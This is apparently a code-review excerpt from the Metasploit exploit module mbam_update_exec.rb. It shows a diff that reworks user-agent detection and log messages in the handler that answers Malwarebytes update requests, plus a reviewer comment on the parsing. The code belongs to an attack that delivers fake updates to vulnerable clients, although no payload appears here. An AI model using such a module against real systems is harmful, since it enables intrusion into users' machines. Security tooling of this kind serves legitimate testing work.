modules/exploits/windows/browser/mbam_update_exec.rb

```diff
@@ -59,48 +68,49 @@ def on_request_uri(cli, request)
     uri = request.uri
 
     newvers = {
-      'mbam' => '2.0.3.1025',
+      'mbam' => '2.0.3.1025', # Legit fixed versions
       'mbae' => '1.04.1.1012'
     }
 
-    unless agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
-      print_error("User agent cannot be identified")
+    agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
+
+    if agent
+      vprint_status "User-Agent '#{agent.upcase}' detected."
+    else
+      print_error("User agent cannot be identified, trying anyway.")
       send_response(cli, '')
       return
     end
 
     unless agent =~ /^mba(m|e)/
-      print_error("Unknown user agent connected")
-      send_response(cli, '')
+      print_error("Unknown user agent connected, aborting.")
       return
     end
 
     case uri
     when "/v2/#{agent}/consumer/version.chk"
-      print_status("#{agent.upcase} connected")
-
       unless ua
-        print_status("Client may not be vulnerable")
+        print_status("Client User-Agent '#{ua}' isn't vulnerable, aborting.")
```

Comment:
```
agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
```
If the User-Agent header is not set, then the agent is extracted from the request URI which will be either ```/v2/mbam/...``` or ```/v2/mbae/...```.